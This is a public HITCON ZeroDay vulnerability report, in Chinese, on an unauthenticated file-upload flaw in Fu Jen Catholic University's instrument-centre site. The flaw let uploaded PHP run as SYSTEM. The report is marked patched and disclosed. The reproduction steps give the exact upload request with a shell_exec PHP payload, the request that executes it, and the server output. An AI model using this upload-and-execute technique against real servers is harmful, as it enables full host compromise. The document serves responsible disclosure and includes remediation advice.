輔仁大學貴重儀器中心未授權檔案上傳導致遠端程式碼執行(RCE / SYSTEM 權限) - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2026-00866
  •  發信 Vendor: 輔仁大學學校財團法人輔仁大學
  • Title: 輔仁大學貴重儀器中心未授權檔案上傳導致遠端程式碼執行(RCE / SYSTEM 權限)
  • Introduction: 貴重儀器中心 /api/common/uploadFile 端點未經身分驗證即可上傳任意 .php 檔案並由伺服器執行,造成未授權 RCE,且程序權限為 nt authority\system。

處理狀態

目前狀態

公開
Last Update : 2026/08/06
  • 新提交
  • 已審核
  • 已通報
  • 已修補
  • 未複測
  • 公開

處理歷程

  • 2026/06/23 10:36:33 : 新提交 (由 Ethan Yang 更新此狀態)
  • 2026/06/25 16:41:55 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/07/23 15:56:02 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/07/23 15:56:02 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/07/23 15:56:02 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/07/29 14:14:01 : 已修補 (由 組織帳號 更新此狀態)
  • 2026/08/06 03:00:08 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2026-00866
  • 通報者:yangminchun (Ethan Yang)
  • 風險:嚴重
  • 類型:程式碼執行 (Code Execution)

參考資料

攻擊者可藉由此漏洞執行惡意程式碼,進行如操縱網站作業系統等惡意行為。
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

https://fjuic.fju.edu.tw/api/common/uploadFile
https://fjuic.fju.edu.tw/uploads/file/202606/23/file_1782145938_TV3NSQ39W0.php
https://fjuic.fju.edu.tw/uploads/file/202606/23/file_1782182128_XEISEcuETn.php

敘述

摘要

POST /api/common/uploadFile 在無需任何身分驗證的情況下接受任意檔案上傳。上傳 .php 檔案會被伺服器直接執行
whoami 權限為 nt authority\system,構成未授權遠端程式碼執行 (RCE)。

重現步驟

步驟一:上傳

POST /api/common/uploadFile HTTP/2

Host: fjuic.fju.edu.tw

Content-Type: multipart/form-data
[email protected] (內容:<?php echo shell_exec("whoami"); ?>)

{
  "result_code": 1,
  "content": {
    "path": "/uploads/file/202606/23/file_1782145938_TV3NSQ39W0.php",
    "file_name": "file_1782145938_TV3NSQ39W0.php"
  },
  "http_code": 200
}

步驟二:執行

GET /uploads/file/202606/23/file_1782145938_TV3NSQ39W0.php HTTP/2

Host: fjuic.fju.edu.tw
回應: nt authority\system

已驗證

  • 上傳與存取全程不需身分驗證、Session 或 CSRF token
  • 無檔案類型限制,.php 被接受並以原副檔名儲存
  • 上傳檔案位於可由外部直接存取的目錄 (/uploads/file/YYYYMM/DD/)
  • 伺服器會執行上傳的 PHP 檔案
  • php_uname("s") 回傳 Windows NT
  • whoami 回傳 nt authority\system
  • 伺服器環境:nginx/1.26.3、PHP 8.2.28(X-Powered-By)

影響

任意未授權攻擊者可在伺服器上以最高權限 (SYSTEM) 執行任意指令,等同完全控制該主機,可進一步竊取資料、植入後門,甚至架設後門入侵內網

殘留檔案需立即清除

測試用 PoC 檔案目前仍存放於:
/uploads/file/202606/23/file_1782145938_TV3NSQ39W0.php
該檔案本身即為一個任何人皆可存取的入口,請於修補前優先刪除。

修補建議

1. 對上傳點加上身分驗證和授權檢查。
2. 採用副檔名與 MIME 白名單,僅允許必要的檔案類型
3. 將上傳目錄移出 web root;若無法移出,於 nginx 設定中停用該目錄的 PHP 執行(不將 .php 交給 PHP-FPM)。
4. 上傳檔案一律重新命名並移除可執行副檔名。
5. 降低 web 服務執行權限,勿以 SYSTEM 執行。
6. 立即刪除已上傳的測試檔案 file_1782145938_TV3NSQ39W0.php。

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;